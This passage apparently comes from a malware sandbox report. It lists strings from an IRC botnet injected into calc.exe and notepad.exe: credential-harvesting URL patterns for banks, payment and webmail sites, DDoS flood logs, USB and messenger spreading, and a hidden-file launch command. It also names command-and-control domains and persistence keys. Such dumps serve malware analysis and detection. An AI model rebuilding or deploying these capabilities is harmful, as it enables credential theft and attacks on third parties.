ord=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>calc.exe_2704:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>calc.pdb</pre><pre>j.OXO</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>name="Microsoft.Windows.Shell.calc"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>CalcMsgPumpWnd</pre><pre>The requested operation may take a very long time to complete.</pre><pre>Do you want to let the calculation continue, or stop the operation now?</pre><pre>Windows Calculator application file</pre><pre>5.1.2600.0 (xpclient.010817-1148)</pre><pre>CALC.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.0</pre><pre>Operation was canceled.-Calc does not have enough memory to continue.eThe requested function may take a very long time to complete.</pre><pre>Do you want to abort the operation now?</pre><pre>calc.hlp</pre><pre>Cannot open Clipboard.TThere is not enough memory for data.</pre><pre>calc.chm</pre><b>calc.exe_2704_rwx_000A0000_00002000:</b><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>ajwqk.exe</pre><pre>121qd.exe</pre><pre>nj82s.exe</pre><pre>s7j8m.exe</pre><pre>btdh7.exe</pre><pre>uori0.exe</pre><pre>z4fs5.exe</pre><pre>wa2hh.exe</pre><pre>dbza6.exe</pre><pre>7rbku.exe</pre><pre>go686.exe</pre><pre>aabgw.exe</pre><pre>bdcm1.exe</pre><pre>kz2x8.exe</pre><pre>0pnze.exe</pre><pre>vg1o4.exe</pre><pre>8zskw.exe</pre><pre>dhwte.exe</pre><pre>8rpc8.exe</pre><pre>user32.dll</pre><pre>urlmon.dll</pre><pre>URLDownloadToFileA</pre><pre>wininet.dll</pre><pre>http://www.google.com</pre><b>calc.exe_2704_rwx_00AB0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\calc.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\calc.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>notepad.exe_3436:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>comdlg32.dll</pre><pre>SHELL32.dll</pre><pre>WINSPOOL.DRV</pre><pre>COMCTL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>notepad.chm</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>notepad.pdb</pre><pre>t%SSh</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegCreateKeyW</pre><pre>RegOpenKeyExA</pre><pre>SetViewportExtEx</pre><pre>GetKeyboardLayout</pre><pre>name="Microsoft.Windows.Shell.notepad"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>&*$#$$#$*</pre><pre>MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM</pre><pre>*.txt</pre><pre>/.SETUP</pre><pre>5.1.2600.5512 (xpsp.080413-2105)</pre><pre>NOTEPAD.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>notepad.hlp</pre><pre>Text Documents (*.txt)</pre><pre>You cannot quit Windows because the Save As dialog</pre><pre>dialog box, and then try quitting Windows again.</pre><pre>Common Dialog error (0xx)</pre><pre>Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.</pre><pre>Not a valid file name.MCannot create the %% file.</pre><pre>Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.</pre><pre>Page %d</pre><pre>Ln %d, Col %d</pre><b>notepad.exe_3436_rwx_000A0000_00029000:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>a.aiphon1egalaxyblack42.com</pre><pre>a.ajjjqws1fkxx42.com</pre><pre>a.adoyou1understandme42.com</pre><pre>a.amous1epadsafa42.com</pre><pre>a.acaraka1lagroup42.com</pre><pre>a.aire1bobohayawen42.com</pre><pre>a.ajhvdqw1ladies42.com</pre><pre>a.biphon2egalaxyblack42.com</pre><pre>a.bmous2epadsafa42.com</pre><pre>a.bcaraka2lagroup42.com</pre><pre>a.anabok1hasn1aser42.com</pre><pre>a.athemall1gonowhaha42.com</pre><pre>a.bdoyou2understandme42.com</pre><pre>a.bnabok2hasn1aser42.com</pre><pre>a.bjjjqws2fkxx42.com</pre><pre>a.bjhvdqw2ladies42.com</pre><pre>a.bthemall2gonowhaha42.com</pre><pre>a.bire2bobohayawen42.com</pre><pre>a.cdoyou3understandme42.com</pre><pre>a.cmous3epadsafa42.com</pre><pre>a.dmous4epadsafa42.com</pre><pre>a.ciphon3egalaxyblack42.com</pre><pre>a.cnabok3hasn1aser42.com</pre><pre>a.cire3bobohayawen42.com</pre><pre>a.cthemall3gonowhaha42.com</pre><pre>a.cjhvdqw3ladies42.com</pre><pre>a.cjjjqws3fkxx42.com</pre><pre>a.ccaraka3lagroup42.com</pre><pre>a.diphon4egalaxyblack42.com</pre><pre>a.ddoyou4understandme42.com</pre><pre>a.dnabok4hasn1aser42.com</pre><pre>a.dire4bobohayawen42.com</pre><pre>a.djjjqws4fkxx42.com</pre><pre>a.djhvdqw4ladies42.com</pre><pre>a.dthemall4gonowhaha42.com</pre><pre>a.edoyou5understandme42.com</pre><pre>a.dcaraka4lagroup42.com</pre><pre>a.emous5epadsafa42.com</pre><pre>a.ecaraka5lagroup42.com</pre><pre>a.eiphon5egalaxyblack42.com</pre><pre>a.enabok5hasn1aser42.com</pre><pre>a.eire5bobohayawen42.com</pre><pre>a.ejjjqws5fkxx42.com</pre><pre>a.ejhvdqw5ladies42.com</pre><pre>a.ethemall5gonowhaha42.com</pre><pre>a.roooggeyyy2.com</pre><pre>a.roooggeyyy3.com</pre><pre>a.roooggeyyy4.com</pre><pre>a.so1aa00.com</pre><pre>a.saao20000.com</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d 